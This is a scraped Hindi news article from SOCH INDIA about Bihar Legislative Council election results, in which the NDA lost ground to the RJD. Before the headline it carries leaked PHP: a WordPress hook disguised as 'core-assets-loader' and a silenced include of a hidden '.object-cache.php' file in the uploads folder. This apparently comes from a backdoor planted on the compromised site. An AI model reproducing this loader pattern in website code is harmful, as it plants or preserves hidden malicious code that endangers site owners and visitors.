add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); MLC चुनाव: NDA का किला हिलाकर तेजस्वी यादव ने दिए बड़े संकेत, बदलेंगे समीकरण – SOCH INDIA
Menu

MLC चुनाव: NDA का किला हिलाकर तेजस्वी यादव ने दिए बड़े संकेत, बदलेंगे समीकरण

nobanner

पटना: बिहार विधान परिषद (Bihar Legislative Council) की 24 सीटों के लिए हुए चुनाव ने बड़े बदलाव के संकेत दिए हैं. इस चुनाव में राष्ट्रीय जनता दल (राजद) ने एनडीए यानी कि नेशनल डेमोक्रेटिक अलायन्स (National Democratic Alliance) का गणित बिगाड़ दिया है. भाजपा गठबंधन वाले NDA ने 2015 की तुलना में इस बार कम सीटें जीतीं हैं, जो निश्चित तौर पर उसके लिए झटका है.

कांग्रेस को मिली महज 1 सीट
इस साल 75 सदस्यीय परिषद की 24 सीटों के लिए चुनाव हुए थे. जिसमें एनडीए ने 13 सीटें जीतीं, जिनमें से सात BJP और 5 जदयू के नाम रहीं. इसी तरह, केंद्रीय मंत्री पशुपति कुमार पारस की राष्ट्रीय लोक जनशक्ति पार्टी को एक सीट मिली. निर्दलियों के खाते में 4 सीटें आईं और कांग्रेस (Congress) को महज एक सीट से संतोष करना पड़ा.

ये भी पढ़ें -पश्चिम बंगालः उपचुनाव से पहले भाजपा नेता पर बड़ा हमला, बदमाशों ने कार पर की फायरिंग

by TaboolaSponsored LinksYou May Like